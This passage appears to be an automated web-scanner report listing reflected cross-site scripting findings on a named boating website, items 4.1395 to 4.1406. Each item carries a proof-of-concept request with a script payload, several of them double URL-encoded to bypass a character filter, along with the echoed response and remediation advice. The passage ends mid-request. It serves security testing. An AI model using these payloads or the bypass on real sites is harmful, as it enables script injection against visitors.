
Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/justyesterday?314be%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e162c4d495b9=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/justyesterday?314be"><script>alert(1)</script>162c4d495b9=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1395. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc1e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e981f5a3f63a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cc1e7"><script>alert(1)</script>981f5a3f63a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/lifestyle?cc1e7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e981f5a3f63a=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/lifestyle?cc1e7"><script>alert(1)</script>981f5a3f63a=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1396. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/profiles

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed38ae411bb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b6d3"><script>alert(1)</script>d38ae411bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/profiles?7b6d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed38ae411bb6=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/profiles?7b6d3"><script>alert(1)</script>d38ae411bb6=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1397. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/technical

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22fdb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ec098217 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22fdb"><script>alert(1)</script>60ec098217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/technical?22fdb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60ec098217=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/technical?22fdb"><script>alert(1)</script>60ec098217=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1398. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/type-of-boat

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fc8ed8b81c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17b36"><script>alert(1)</script>9fc8ed8b81c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /features/type-of-boat?17b36%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fc8ed8b81c=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:54 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/features/type-of-boat?17b36"><script>alert(1)</script>9fc8ed8b81c=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1399. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b17a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea893ecab85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b17a"><script>alert(1)</script>a893ecab85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111&9b17a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea893ecab85e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:49:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:49:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/buy-a-boat?9b17a"><script>alert(1)</script>a893ecab85e=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1400. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_x parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the image_x request parameter is copied into the HTML document as plain text between tags. The payload 4eeec<script>alert(1)</script>a46501efcd6 was submitted in the image_x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=04eeec<script>alert(1)</script>a46501efcd6&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 04eeec<script>alert(1)</script>a46501efcd6px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
   font:normal 28px Geneva, Arial, Helvetica, sans-ser
...[SNIP]...

4.1401. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [image_y parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the image_y request parameter is copied into the HTML document as plain text between tags. The payload e255c<script>alert(1)</script>249d8d38b12 was submitted in the image_y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0e255c<script>alert(1)</script>249d8d38b12&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0e255c<script>alert(1)</script>249d8d38b12px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
   font:normal 28px Geneva, Arial, Helvet
...[SNIP]...

4.1402. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_height parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the module_height request parameter is copied into the HTML document as plain text between tags. The payload 83595<script>alert(1)</script>8968cd8d5c9 was submitted in the module_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=27083595<script>alert(1)</script>8968cd8d5c9&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 27083595<script>alert(1)</script>8968cd8d5c9px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;

...[SNIP]...

4.1403. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the module_width request parameter is copied into the HTML document as plain text between tags. The payload 430cc<script>alert(1)</script>0b9b8e7996f was submitted in the module_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615430cc<script>alert(1)</script>0b9b8e7996f&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615430cc<script>alert(1)</script>0b9b8e7996fpx;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margi
...[SNIP]...

4.1404. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_bgcolor parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload c2c09<script>alert(1)</script>e6026c228c was submitted in the text_block_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffffc2c09<script>alert(1)</script>e6026c228c&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffffc2c09<script>alert(1)</script>e6026c228c;
   opacity: 0;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 405px;
   top: 0px;
}

a.gk_news_image_1_prev, a.
...[SNIP]...

4.1405. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_margin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_margin request parameter is copied into the HTML document as plain text between tags. The payload 92616<script>alert(1)</script>ce159aaf62 was submitted in the text_block_margin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=40592616<script>alert(1)</script>ce159aaf62&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...

}

div.gk_news_image_1_text_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 40592616<script>alert(1)</script>ce159aaf62px;
   background-color: #ffffff;
   opacity: 0;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 40592616<script>
...[SNIP]...

4.1406. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_opacity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_opacity request parameter is copied into the HTML document as plain text between tags. The payload 45c34<script>alert(1)</script>10eff4952b3 was submitted in the text_block_opacity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=045c34<script>alert(1)</script>10eff4952b3&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
